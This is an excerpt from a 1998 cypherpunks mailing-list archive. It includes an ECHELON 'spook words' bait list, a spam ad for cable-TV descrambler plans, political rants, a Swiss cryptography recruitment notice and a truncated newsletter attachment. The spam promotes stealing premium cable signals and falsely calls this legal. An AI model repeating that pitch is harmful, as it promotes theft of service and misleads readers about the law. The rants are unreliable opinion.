http://www.hamradio-online.com/1996/dec/echelon.html
http://www.saar.de/~bong/archiv/echelon.html


Hope all this helps.


Best regards,

Simon Johnson
Technical Director
Shake Communications
Experts in Internet and Information Security
http://www.shake.net
-------------------------MESSAGE SEPARATOR-----------------------------
Don't be alarmed, this is only bait for eavesdropping government computers
at NSA Inc., CIA Inc. and FBI Inc. Pirates, Privateers and Brigands that
they are!!!!
Their computers are keyed to trigger on such words and copy the suspect
communications to their system.  If enough people would do this, we could
bog their system down and thus hopefully prove to them how fruitless and
immoral this whole thing is.

Your right to privacy in personal communications does matter!  Do something
about it!

EXPLOSIVES,GUNS,ASSASSINATION, CONSPIRACY, PRIMERS, DETONATORS, INITIATORS,
MAIN CHARGE, NUCLEAR CHARGES, AMBUSH, SNIPING, MOTORCADE,IRS, BATF, JTF-6,
MJTF, HRT, SRT, HOSTAGES, MUNITIONS, WEAPONS, TNT, RDX, AMFO, HMTD, PICRIC
ACID, SILVER NITRITE, MERCURY FULMINATE, PRESIDENTIAL MOTORCADE, SALT
PETER, CHARCOAL, SULPHER, C4, COMPOSITION B, AMATOL, PETN, LEAD AZIDE, LEAD
STYPHANTE, DDNP, TETRYL, NITROCELLULOSE, NITROSTARCH, MINES, GRENADES,
ROCKETS, FUSES, DELAY MECHANISM, MORTARS, RPG7, PROPELLANTS, INCINDIARIES,
INCINDIARY DEVICE, THERMITE, SECURITY FORCES, INTELLIGENCE, AGENCIES,HRT,
RESISITANCE, PSYOPS, INFILTRATION, ASSAULT TEAM, DEFENSIVE ELEMENTS,
EVASION, DETECTION, MISSION, COMMUNICATIONS,  THE FOOTBALL, PLATTER CHARGE,
SHAPED CHARGES, M118, CLAYMORE, BODY ARMOR, CHARGES, SHRAPNEL, TIMERS,
TIMING DEVICES, BOOBYTRAPS, DETCORD, PMK 40, SILENCERS, UZI, HK-MP5, AK-47,
FAL, JATTI,  SKORPION MP, TEFLON BULLETS, CORDITE, NAPALM, LAW, STINGERS,
RPK, SOCIMI 821 SMG, STEN, BAR, MP40, HK-G3,FN-MAG, RPD,PzB39, AIR FORCE
ONE,  M60, RPK74, SG530, SG540, GALIL ARM, WALTHER WA2000, HK33KE,
PARKER-HALE MOD. 82, AKR, INGRAM MAC10, M3, L34A1, WALTHER MPL,, AKS-74,
HK-GR6, SUBSONIC ROUNDS, BALLISTIC MEDIA,  SPECIAL FORCES, JFKSWC, SFOD-D,
SRT, Rewson, SAFE, Waihopai, INFOSEC, ASPIC, Information Security, SAI,
Information Warfare, IW, IS, Privacy, Information Terrorism, Kenya,
Terrorism Defensive Information, Defense Information Warfare, Offensive
Information, Offensive Information Warfare, NAIA, SAPM, ASU, ECHELON
ASTS, National Information Infrastructure, InfoSec, SAO, Reno, Compsec,
JICS, Computer Terrorism, Firewalls, Secure Internet Connections,
RSP, ISS, JDF, Passwords, NAAP, DefCon V, RSO, Hackers, Encryption, ASWS,
Espionage, USDOJ, NSA, CIA, S/Key, SSL, FBI, Secert
Service, USSS, Defcon, Military, White House, Undercover, NCCS, Mayfly,
PGP, SALDV, PEM, resta, RSA, Perl-RSA, MSNBC, bet, AOL,
AOL TOS, CIS, CBOT, AIMSX, STARLAN, 3B2, BITNET, Tanzania, SAMU, COSMOS,
DATTA, E911, FCIC, HTCIA, IACIS, UT/RUS, JANET,
ram, JICC, ReMOB, LEETAC, UTU, VNET, BRLO, SADCC, NSLEP, SACLANTCEN, FALN,
877, NAVELEXSYSSECENGCEN, BZ,
CANSLO, CBNRC, CIDA, JAVA, rsta, Active X, Compsec 97, RENS, LLC, DERA,
JIC, rip, rb, Wu, RDI, Mavricks, BIOL, Meta-hackers, ^?,
SADT, Steve Case, Tools, RECCEX, Telex, OTAN, monarchist, NMIC, NIOG, IDB,
MID/KL, NADIS, NMI, SEIDM, BNC, CNCIS,
STEEPLEBUSH, RG, BSS, DDIS, mixmaster, BCCI, BRGE, SARL, Military
Intelligence, JICA, Scully, recondo, Flame, Infowar, Bubba,
Freeh, Archives, ISADC, CISSP, Sundevil, jack, Investigation, JOTS, ISACA,
NCSA, ASVC, spook words, RRF, 1071, Bugs Bunny, Verisign,
Secure, ASIO, Lebed, ICE, NRO, Lexis-Nexis, NSCT, SCIF, FLiR, JIC, bce,
Lacrosse, Flashbangs, HRT, IRA, EODG, DIA, USCOI, CID,
BOP, FINCEN, FLETC, NIJ, ACC, AFSPC, BMDO, site, SASSTIXS, NAVWAN, NRL, RL,
NAVWCWPNS, NSWC, USAFA, AHPCRC,
ARPA, SARD, LABLINK, USACIL, SAPT, USCG, NRC, ~, O, NSA/CSS, CDC, DOE,
SAAM, FMS, HPCC, NTIS, SEL, USCODE, CISE,
SIRC, CIM, ISN, DJC, bemd, SGC, UNCPCJ, CFC, SABENA, DREO, CDA, SADRS, DRA,
SHAPE, bird dog, SACLANT, BECCA,
DCJFTF, HALO, SC, TA SAS, Lander, GSM, T Branch, AST, SAMCOMM, HAHO, FKS,
868, GCHQ, DITSA, SORT, AMEMB, NSG, HIC,
EDI, benelux, SAS, SBS, SAW, UDT, EODC, GOE, DOE, SAMF, GEO, JRB, 3P-HV,
Masuda, Forte, AT, GIGN, Exon Shell, radint, MB,
CQB, CONUS, CTU, RCMP, GRU, SASR, GSG-9, 22nd SAS, GEOS, EADA, SART, BBE,
STEP, Echelon, Dictionary, MD2, MD4, MDA,
diwn, 747, ASIC, 777, RDI, 767, MI5, 737, MI6, 757, Kh-11, EODN, SHS, ^X,
Shayet-13, SADMS, Spetznaz, Recce, 707, CIO, NOCS,
Halcon, NSS, Duress, RAID, Uziel, wojo, Psyops, SASCOM, grom, NSIRL, D-11,
SERT, VIP, ARC, S.E.T. Team, NSWG, MP5k, SATKA,
DREC, DEVGRP, DF, DSD, FDM, GRU, LRTS, SIGDEV, NACSI, MEU/SOC,PSAC, PTT,
RFI, ZL31, SIGDASYS, TDM. SUKLO,
SUSLO, TELINT, fake, TEXTA. ELF, LF, MF, SIGS, VHF, Recon, peapod,
PA598D28, Spall, dort, 50MZ, 11Emc Choe, SATCOMA, UHF,
SHF, ASIO, SASP, WANK, Colonel, domestic disruption, 5ESS, smuggle, Z-200,
15kg, DUVDEVAN, RFX, nitrate, OIR, Pretoria, M-14,
enigma, Bletchley Park, Clandestine, NSO, nkvd, argus, afsatcom, CQB, NVD,
Counter Terrorism Security, SARA, Rapid Reaction, JSOFC3IP,
Corporate Security, Police, sniper, PPS, ASIS, ASLET, TSCM, Security
Consulting, M-x spook, Z-150T, High Security, Security Evaluation,
Electronic Surveillance, MI-17, ISR, NSAS, Counterterrorism, real, spies,
IWO, eavesdropping, debugging, CCSS, interception, COCOT,
NACSI, rhost, rhosts, ASO, SETA, Amherst, Broadside, Capricorn, NAVCM,
Gamma, Gorizont, Guppy, NSS, rita, ISSO, submiss, ASDIC, .tc,
2EME REP, FID, 7NL SBS, tekka, captain, 226, .45, nonac, .li, Ionosphere,
Mole, Keyhole, NABS, Kilderkin, Artichoke, Badger, Emerson,
Tzvrif, SDIS, T2S2, STTC, DNR, NADDIS, NFLIS, CFD, quarter, Cornflower,
Daisy, Egret, Iris, JSOTF, Hollyhock, Jasmine, Juile, Vinnell,
B.D.M., Sphinx, Stephanie, Reflection, Spoke, Talent, Trump, FX, FXR, IMF,
POCSAG, rusers, Covert Video, Intiso, r00t, lock picking,
Beyond Hope, LASINT, csystems, .tm, passwd, 2600 Magazine, JUWTF,
Competitor, EO, Chan, Pathfinders, SEAL Team 3, JTF, Nash,
ISSAA, B61-11, Alouette, executive, Event Security, Mace, Cap-Stun,
stakeout, ninja, ASIS, ISA, EOD, Oscor, Merlin, NTT, SL-1, Rolm, TIE,
Tie-fighter, PBX, SLI, NTT, MSCJ, MIT, 69, RIT, Time, MSEE, Cable &
Wireless, CSE, SUW, J2, Embassy, ETA, Fax, finks, Fax
encryption, white noise, Fernspah, MYK, GAFE, forcast, import, rain, tiger,
buzzer, N9, pink noise, CRA, M.P.R.I., top secret, Mossberg,
50BMG, Macintosh Security, Macintosh Internet Security, OC3, Macintosh
Firewalls, Unix Security, VIP Protection, SIG, sweep, Medco, TRD,
TDR, Z, sweeping, SURSAT, 5926, TELINT, Audiotel, Harvard, 1080H, SWS,
Asset, Satellite imagery, force, NAIAG, Cypherpunks, NARF,
127, Coderpunks, TRW, remailers, replay, redheads, RX-7, explicit, FLAME,
JTF-6,, AVN, , ISSSP, Anonymous, W, Sex,
chaining, codes, Nuclear, 20, subversives, SLIP, toad, fish, data havens,
unix, c, a, b, d, SUBACS, the, Elvis, quiche, DES, 1*, NATIA, NATOA,
sneakers, UXO, (), OC-12, counterintelligence, Shaldag, sport, NASA, TWA,
DT, gtegsc, nowhere, .ch, hope, emc, industrial espionage, SUPIR,
PI, TSCI, spookwords, industrial intelligence, H.N.P., SUAEWICS, Juiliett
Class Submarine, Locks, qrss, loch, 64 Vauxhall Cross, Ingram
Mac-10, wwics, sigvoice, ssa, E.O.D., SEMTEX, penrep, racal, OTP, OSS,
Siemens, RPC, Met, CIA-DST, INI, watchers, keebler, contacts,
Blowpipe, BTM, CCS, GSA, Kilo Class, squib, primacord, RSP, Z7, Becker,
Nerd, fangs, Austin, no|d, Comirex, GPMG, Speakeasy, humint,
GEODSS, SORO, M5, BROMURE, ANC, zone, SBI, DSS, S.A.I.C., Minox, Keyhole,
SAR, Rand Corporation, Starr, Wackenhutt, EO,
burhop, Wackendude, mol, Shelton, 2E781, F-22, 2010, JCET, cocaine, Vale,
IG, Kosovo, Dake, 36,800, Hillal, Pesec, Hindawi, GGL, NAICC,
CTU, botux, Virii, CCC, ISPE, CCSC, Scud, SecDef, Magdeyev, VOA, Kosiura,
Small Pox, Tajik, +=, Blacklisted 411, TRDL, Internet
Underground, BX, XS4ALL, wetsu, muezzin, Retinal Fetish, WIR, Fetish, FCA,
Yobie, forschung, emm, ANZUS, Reprieve, NZC-332, edition,
cards, mania, 701, CTP, CATO, Phon-e, Chicago Posse, NSDM, l0ck, spook,
keywords, QRR, PLA, TDYC, W3, CUD, CdC, Weekly World
News, Zen, World Domination, Dead, GRU, M72750, Salsa, 7, Blowfish,
Gorelick, Glock, Ft. Meade, NSWT, press-release, WISDIM, burned,
Indigo, wire transfer, e-cash, Bubba the Love Sponge, Enforcers, Digicash,
zip, SWAT, Ortega, PPP, NACSE, crypto-anarchy, AT&T, SGI, SUN,
MCI, Blacknet, ISM, JCE, Middleman, KLM, Blackbird, NSV, GQ360, X400,
Texas, jihad, SDI, BRIGAND, Uzi, Fort Meade, *&, gchq.gov.uk,
supercomputer, bullion, 3, NTTC, Blackmednet, :, Propaganda, ABC, Satellite
phones, IWIS, Planet-1, ISTA, rs9512c, South Africa, Sergeyev,
Montenegro, Toeffler, Rebollo, sorot, cryptanalysis, nuclear, 52 52 N - 03
03 W, Morgan, Canine, GEBA, INSCOM, MEMEX, Stanley, FBI,
Panama, fissionable, Sears Tower, NORAD, Delta Force, SEAL, virtual, WASS,
WID, Dolch, secure shell, screws, Black-Ops, O/S, Area51,
SABC, basement, ISWG, $@, data-haven, NSDD, black-bag, rack, TEMPEST,
Goodwin, rebels, ID, MD5, IDEA, garbage, market, beef, Stego,
ISAF, unclassified, Sayeret Tzanhanim, PARASAR, Gripan, pirg, curly,
Taiwan, guest, utopia, NSG, orthodox, CCSQ, Alica, SHA, Global,
gorilla, Bob, UNSCOM, Fukuyama, Manfurov, Kvashnin, Marx, Abdurahmon,
snullen, Pseudonyms, MITM, NARF, Gray Data, VLSI, mega,
Leitrim, Yakima, NSES, Sugar Grove, WAS, Cowboy, Gist, 8182, Gatt,
Platform, 1911, Geraldton, UKUSA, veggie, XM, Parvus, NAVSVS,
3848, Morwenstow, Consul, Oratory, Pine Gap, Menwith, Mantis, DSD, BVD,
1984, blow out, BUDS, WQC, Flintlock, PABX, Electron,
Chicago Crust, e95, DDR&E, 3M, KEDO, iButton, R1, erco, Toffler, FAS, RHL,
K3, Visa/BCC, SNT, Ceridian, STE, condor,
CipherTAC-2000, Etacs, Shipiro, ssor, piz, fritz, KY, 32, Edens, Kiwis,
Kamumaruha, DODIG, Firefly, HRM, Albright, Bellcore, rail, csim,
NMS, 2c, FIPS140-1, CAVE, E-Bomb, CDMA, Fortezza, 355ml, ISSC, cybercash,
NAWAS, government, NSY, hate, speedbump, joe,
illuminati, BOSS, Kourou, Misawa, Morse, HF, P415, ladylove, filofax, Gulf,
lamma, Unit 5707, Sayeret Mat'Kal, Unit 669, Sayeret Golani,
Lanceros, Summercon, NSADS, president, ISFR, freedom, ISSO, walburn, Defcon
VI, DC6, Larson, P99, HERF pipe-bomb, 2.3 Oz., cocaine, $,
imapct, Roswell, ESN, COS, E.T., credit card, b9, fraud, ST1, assasinate,
virus, ISCS, ISPR, anarchy, rogue, mailbomb, 888, Chelsea, 1997,
Whitewater, MOD, York, plutonium, William Gates, clone, BATF, SGDN, Nike,
WWSV, Atlas, IWWSVCS, Delta, TWA, Kiwi, PGP 2.6.2.,
PGP 5.0i, PGP 5.1, siliconpimp, SASSTIXS, IWG, Lynch, 414, Face, Pixar,
IRIDF, NSRB, eternity server, Skytel, Yukon, Templeton,
Johohonbu, LUK, Cohiba, Soros, Standford, niche, ISEP, ISEC, 51, H&K, USP,
^, sardine, bank, EUB, USP, PCS, NRO, Red Cell, NSOF,
Glock 26, snuffle, Patel, package, ISI, INR, INS, IRS, GRU, RUOP, GSS, NSP,
SRI, Ronco, Armani, BOSS, Chobetsu, FBIS, BND, SISDE,
FSB, BfV, IB, froglegs, JITEM, SADF, advise, TUSA, LITE, PKK, HoHoCon,
SISMI, ISG, FIS, MSW, Spyderco, UOP, SSCI, NIMA,
HAMASMOIS, SVR, SIN, advisors, SAP, Monica, OAU, PFS, Aladdin, AG,
chameleon man, Hutsul, CESID, Bess, rail gun, .375, Peering,
CSC, Tangimoana Beach, Commecen, Vanuatu, Kwajalein, LHI, DRM, GSGI, DST,
MITI, JERTO, SDF, Koancho, Blenheim, Rivera,
Kyudanki, varon, 310, 17, 312, NB, CBM, CTP, Sardine, SBIRS, jaws, SGDN,
ADIU, DEADBEEF, IDP, IDF, Halibut, SONANGOL, Flu, &,
Loin, PGP 5.53, meta, Faber, SFPD, EG&G, ISEP, blackjack, Fox, Aum, AIEWS,
AMW, RHL, Baranyi, WORM, MP5K-SD, 1071, WINGS,
cdi, VIA, DynCorp, UXO, Ti, WWSP, WID, osco, Mary, honor, Templar, THAAD,
package, CISD, ISG, BIOLWPN, JRA, ISB, ISDS, chosen,
LBSD, van, schloss, secops, DCSS, DPSD, LIF, PRIME, SURVIAC, telex, SP4,
Analyzer, embassy, Golf, B61-7, Maple, Tokyo, ERR, SBU,
Threat, JPL, Tess, SE, EPL, SPINTCOM, ISS-ADP, Merv, Mexico, SUR, SO13,
Rojdykarna, airframe, 510, EuroFed, Avi, shelter, Crypto AG,
----------------------------------------------------------------------
A Democracy: Three wolves and a sheep voting on dinner.
A Republic: The flock gets to vote for which wolves vote on dinner.
A Constitutional Republic:  Voting on dinner is expressly forbidden, and the
sheep are armed.
Federal Government: The means by which the sheep will be fooled into voting
for a Democracy...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mudoe38@hokomaha.co.nz (The Hobby Pros)
Date: Mon, 17 Aug 1998 21:31:06 -0700 (PDT)
To: mudoe38@hokomaha.co.nz
Subject: Cable TV...... No Monthly Bills
Message-ID: <199808174206XAA7811@Lantrops.psych.uw.edu.pl>
MIME-Version: 1.0
Content-Type: text/plain


This is really cool!                    

              
            PREMIUM CHANNELS........No Monthly Bill!              

                                         


EASY to assemble plans for only $7.00 !
We will send your plans the day we receive your order!


YOU WILL BE WATCHING HBO, SHOWTIME, 
THE MOVIE CHANNEL, Adult stations,
and any other scrambled signal   NEXT WEEK!

You can EASILY assemble a cable descrambler in less than 30 minutes!
You have probably seen many advertisments for similar plans....

 
** BUT OURS are BETTER! *** 

We have compared it to all the others and have actually
IMPROVED the quality and SIMPLIFIED the design !!!


**  We even include PHOTOS! **


OUR PLANS ARE BETTER! 
We have NEW, EASY TO READ,EASY to assemble plans for only $7.00! 
We have seen them advertised for as much as $29.00 and you have 
to wait weeks to receive them!       


WHAT THE OTHERS SAY IS TRUE!

Parts are available at  "The TV HUT"  or any electronics store.  
Trademark rights do not allow us to use a national electronics 
retail chains' name but there is one in your town!


Call and ask them BEFORE you order! 
They are very familiar with these plans and 
will tell you that it.......

       DOES INDEED WORK!    ASK THEM! 


You will need these easy to obtain parts :

 270-235                        mini box
 271-1325                      2.2k ohm resistor 
 278-212                        chasis connectors
 RG59 coaxial cable,
 #12 copper wire, 
 and a variable capacitor.


     They may have to  special order the variable capacitor....
     But WHY WAIT for a special order?  WE have them!

    All you need now is the EASY TO ASSEMBLE plans to
   show you how this money saving device in 30 MINUTES! 
  

  **  WE have secured a supply of the capacitors directly from
      the manufacturer,   and We WILL include one with your plans
       for an ADDITIONAL  $10.00 only!


 It is LEGAL, providing of course you use these
 plans for educational purposes only.

 IT'S FUN!  


We're sure you'll enjoy this!  Our FAMILIES sure do!                           
               * you need one descrambler for each TV.


                   NO MORE MONTHLY BILLS!           

                $  7.00     for plans only                        
                
                $10.00     for variable capacitor only            

                $17.00     for The easy to assemble plans and one variable capacitor!	

                 


Pay by check or money order payable to:           

        The Hobby Pros           
        336 Bon Air Center #254           
        Greenbrae, Ca.           
        94904          		            


Please provide a self addressed stamped envelope (.64)          

So we can RUSH your order to you!










































   If this E-mail offends anyone, we apologize ......and feel free to use the DEL key.










 "By deleting your unwanted EMail you waste one key stroke, yet by 
throwing away paper mail you waste a planet! SAVE OUR TREES and
 support internet EMail instead of traditional mail"! 
^^





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Tue, 18 Aug 1998 03:11:40 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: http://stuffed.net/98/8/18/
Message-ID: <19980818080000.6689.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL below.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the line,  copy it and then paste it into your browser (then
press Return).

http://stuffed.net/98/8/18/

If you  have an email program that can display web pages you
will find today's front cover should have already been disp-
layed and can be clicked on to take you straight to Stuffed.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Leif Ericksen <phantom@wwa.com>
Date: Tue, 18 Aug 1998 06:11:57 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: European freedoms...
In-Reply-To: <4ba9a7724438e3da22a58b331b341097@anonymous>
Message-ID: <35D97D14.50DB96B0@wwa.com>
MIME-Version: 1.0
Content-Type: text/plain


Secret Squirrel wrote:
> 
> >With the exception of some lifestyle options Europeans probably have
> >less freedoms than Americans.
> 
> How come that the fraction of Americans in prison is ten times higher
> than the fraction of West Europeans?

(LONG... summary, AmeriKa lets its people get away with to much.  We try
to spare lives of criminals. Plus the laws are weak so people do not
really fear prision.)

Well lets see.

In America we are allowed to own guns depending on where you are.  As I
understand it in London you can own a gun but it is stored a a gun club
not at your own house.  The Bobbies (sp?) do not carry guns, only the
special forces police units ( like the SWAT of the US. ) It was rumored
once to me if they call those guys our you are as good as dead.

In Japan (my wife as a Marine and was stationed in Okinawa for almost a
year)  if you go to prison you eat fish heads and rice, and you may not
live a long time in the prison (that is what she stated they were told).

Now Singapore does not screw around either.  They just might beat you
with a cane for spray painting your name on the wall. ( The US at best
slaps your hands with a little fine, and maybe community service.)

Lets see now the countries around the Saudi area as I understand it have
tough alcohol, and theft laws.  In some cases your are just terminated
in others you loose a hand.


Now over all I may be way off base, but does it not seem that the US is
a good place to live we have many freedoms.. Commit a crime either get a
slap on the hand or get three squares and a rack. (Oh three meals and a
bed.)  IN some cases being in prison is better for some people here than
not being their. Free food, Free medical care, heat/ac, free workout
equipment, and we now even have those in prison being able to sue the
jailers.  When did that happen anyway, I thought you were supposed to
loose almost all rights once in jail.


DAMN liberal pacifists in this country...  Yes it would suck to go to
jail, *IF* I was living in the streets with now place to go and with no
hope maybe I would commit a crime to get a free bed, meal, et al.

OH another special note:  Towns that have gun laws, like Chicago have
higher crime rates it seems than towns that can have guns.  Like
DesPLains after they enacted a hand gun ban crime increased there. 
HUMMMM, and as I understand it Chicago already has a ban on hand guns,
but guess what they are all over the place.  Go figure.

Time for AmeriKa to learn from other countries, and get tougher on
CRIME, and people that commit said crimes.  AmeriKa should not punish
those that are trying to be decent people by saying you can not protect
your self.
AmeriKa should not let criminals sue a homeowner that shot them while
they were breaking into said homeowners house. AmeriKa should wake up
and smell the coffee and realize that it is hot and *IF* they are stupid
and spill it on themselves go OH shit I am stupid, and not SUE the food
chain for millions of dollars because the coffee was to hot. AmeriKa,
should do as other countries do...  If person A sues person B, and
person A looses the case, person A should pay person B's legal fees.  As
it is now Person A pays their own fees, and person B pays their own
fees.

So do you think we have a little problem here?  I do.  However, I still
believe we live in one of the best places to live in the world. I have
been told this by many of visitors from other countries...


HUMMM  I wonder why.


				- Leif Ericksen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rob Carlson" <robc@xmission.com>
Date: Tue, 18 Aug 1998 07:13:15 -0700 (PDT)
To: "cypherpunks@toad.com>
Subject: Re: European freedoms...
Message-ID: <E0z8mVa-0000t6-00@mail.xmission.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


America is the only country that requires me to be anally violated by one of their official queens as a condition of entry into a country I'm a 
citizen of. In my view, Americans were fooled into trading their freedom for a piece of paper that everyone roundly ignores. Namely, the Bill of 
Rights. 

We should've known America was not a free country when they kept repeating that it was all the time. America is actually a land of intolerant, 
bigoted people who can't wait to kill their neighbors. While all the time proclaiming themselves to be the most moral and free people in the 
universe.

Don't bother suggesting that I 'Love it or Leave It'. I already have. 





Rob Carlson <robc@xmission.com>


-----BEGIN PGP SIGNATURE-----
Version: PGPsdk version 1.0 (C) 1997 Pretty Good Privacy, Inc

iQCVAwUBNdmOSsymxXJdz3TJAQH2zAP+OdkqB92urN2oEKOVK0Ni+uDtmJeb5Bes
mbugAPHVdVbHNiLTuaI8882rAJmSwxQa7cJ0ic2RLfHWlt/meDehEM/PcNL0cmaw
UskfE7aIZewURTa3LBBak+gwGhaqEDDZbAGgYfGAiXjMOxBITir67IPbeNIqj+iW
p5FwFMHfFsQ=
=Z8cJ
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Tue, 18 Aug 1998 19:31:34 -0700 (PDT)
To: coderpunks@toad.com
Subject: Firm X
Message-ID: <v04101013b1fe4439ab9c@[206.169.228.19]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Folks,

This came to me via subliminal channel. I am neither the author of it, nor
do I make any claim that I have vetted the material. I'm posting it only to
honor the request of the sender. I can make no assertions as to its
validity, only that I'm forwarding it as I received it, without any
modifications save my signature and the space I prepended to the key block's
header and footer lines to avoid the normal signing-of-key problems some
might have.

   dave

................................. cut here .................................

'firm x' - as part of its development research effort - is soliciting
interest from technical professionals in the fields of cryptography,
information protection, physical security, network architecture and
security policy.

in connection with its advanced payment system development project and
related network architecture design requirements 'firm x' anticipates a
near immediate need for-

5-7 full time network/software research and development hires
interested parties should possess the highest abilities in symmetric and
asymmetric cryptography, and implementation, network security, hardware
security, network penetration and network architecture design.

3-4 full time hardware research and development hires
interest parties should possess the highest abilities in secure hardware
design and development, tamper resistance, and related fields.

2-3 technical strategy and management directors
interested parties should possess an in depth knowledge of cryptography,
cryptography policy, and information security issues.

candidates must be willing to undertake relocation to 'firm x' offices in
switzerland or bordering nations.

salaries consummate with salary history and experience

distinctive benefits include:
swiss 'b residency permits' for employee and all members of employee's
immediate family 
firm and cantonal sponsored path to swiss citizenship by naturalization
firm sponsored international tax consulting assistance
firm and cantonal subsidized mortgage assistance
firm sponsored language and integration assistance
3 week winter development workshop on site at firm faculties in noted
european ski region

parties responding to this survey will receive preferential treatment
during the actual recruiting process.

please note that this is a solicitation of interest only and not to be
confused with a notice of available positions.

interested parties should reply by email with cv/resume to:

firmx@hotmail.com

pseudonymous responses will be accepted

encrypted responses are encouraged

 -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQENAzXXe34AAAEH/3IECWKVYa42pD3ZwbzIXKnTbY5vVAxr4wqYxVhAzSZC8po4
XHsrUsEZKMmgME4VQMylyGXdcONxUpvbB800bPxDjBpxcuFRU+4TbfowT58eqshH
ZdTHZwxuppRMBchr1UW1D7z8UiO+ZaTMscNltO7e1lqHzA0m4p4ToSRnXLFdC0Ul
yzKaHbGZGj7y4tga4QC17BSqPL/1LcHC/h068QDhzk541UL5lPNyRVUnqZKG7faq
Zv+e1zHMkdMB52cIfC5IexurQYH4qEAcR3UaurwFgmcCaLQwN8ZrQMk2Uy1o1pRy
+p8nrS6PsQH1YClb6XxbDDYZTo8+rC5o7VFheUUABRG0GmZpcm0geCA8ZmlybXhA
aG90bWFpbC5jb20+
=TzYx
 -----END PGP PUBLIC KEY BLOCK-----


-----BEGIN PGP SIGNATURE-----
Version: PGP 6.0
Comment: Get interested in computers -- they're interested in YOU!

iQCVAwUBNdiU26HBOF9KrwDlAQHhqgP+I5lBTy9oTMu1y4yGbTFuTSRDBDpcuiDU
+93EtoPC+H8H56R5f5iNRHuXUtOBzPCi/84ZVJkOW+jHOp1ArHDgaHbnmgtcBEau
Ydq9RI8woCFNzPtOBTo6arxKnt+4VBhQ19w5K2EMy4WzVMNfetLInDMHS7LApvpo
Pznr0zBS4dA=
=EKeI
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Tue, 18 Aug 1998 10:52:09 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - August 18, 1998
Message-ID: <199808181746.MAA04050@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3995.1071713795.multipart/mixed"

--Boundary..3995.1071713795.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit




==========================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.

If you cannot open the icon/attachment, please visit
http://www.wow-com.com/professional/    for the wireless 
daily news.

Don't miss the major conference on implementing 
Phase 2 of the E-911 requirement--August 26-27 
in San Francisco.  For more information, click 
http://www.wow-com.com/pdf/locntech.pdf 
===========================================
 




--Boundary..3995.1071713795.multipart/mixed
Content-Type: application/octet-stream; name="bin00003.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00003.bin"
Content-Description: "_CTIA_Daily_News_19980818.htm"

PEhUTUw+CjxIRUFEPgogICA8TUVUQSBIVFRQLUVRVUlWPSJDb250ZW50LVR5
cGUiIENPTlRFTlQ9InRleHQvaHRtbDsgY2hhcnNldD1pc28tODg1OS0xIj4K
ICAgPE1FVEEgTkFNRT0iQXV0aG9yIiBDT05URU5UPSJDVElBIEVkaXRvcmlh
bCBTdGFmZiI+CiAgIDxNRVRBIE5BTUU9IkdFTkVSQVRPUiIgQ09OVEVOVD0i
TW96aWxsYS80LjAyIFtlbl0gKFdpbjk1OyBJKSBbTmV0c2NhcGVdIj4KICAg
PFRJVExFPl9DVElBIERhaWx5IE5ld3MgRnJvbSBXT1ctQ09NXzwvVElUTEU+
CjwvSEVBRD4KPEJPRFk+CiZuYnNwOzxjZW50ZXI+CjxUQUJMRSBCT1JERVI9
MCBDT0xTPTIgV0lEVEg9IjYwMCIgPgo8VFI+CjxURD48QSBIUkVGPSJodHRw
Oi8vd3d3Lndvdy1jb20uY29tIj48SU1HIFNSQz0iaHR0cDovL3d3dy53b3ct
Y29tLmNvbS9pbWFnZXMvaG9tZWhlZF90ZXN0LmdpZiIgQUxUPSJXT1ctQ09N
LkNPTSIgTk9TQVZFIEJPUkRFUj0wIEhFSUdIVD04OSBXSURUSD0yNzU+PC9B
PjwvVEQ+Cgo8VEQ+CjxDRU5URVI+PEEgSFJFRj0iaHR0cDovL3d3dy53aXJl
bGVzc2l0LmNvbSI+PElNRyBTUkM9Imh0dHA6Ly93d3cud293LWNvbS5jb20v
aW1hZ2VzL2FydGRyb3AvMHdpcmVsZXNzaXQuZ2lmIiBBTFQ9IlRvZGF5J3Mg
TmV3cyBTcG9uc29yZWQgYnkgV0lSRUxFU1MgSS5ULiA5OCIgTk9TQVZFIEJP
UkRFUj0wIEhFSUdIVD02MCBXSURUSD0yMzQ+PC9BPjwvQ0VOVEVSPgo8L1RE
Pgo8L1RSPgo8L1RBQkxFPgombmJzcDsKPFRBQkxFIEJPUkRFUj0wIFdJRFRI
PSI2MDAiID4KPFRSIEJHQ09MT1I9IiMwMDAwOTkiPgo8VEQ+PC9URD4KCjxU
RD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIENPTE9S
PSIjQ0NDQ0NDIj48Rk9OVCBTSVpFPSsxPkNUSUEKRGFpbHkgTmV3cyBmcm9t
IFdPVy1DT00gLSBBdWd1c3QgMTgsIDE5OTg8L0ZPTlQ+PC9GT05UPjwvRk9O
VD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4K
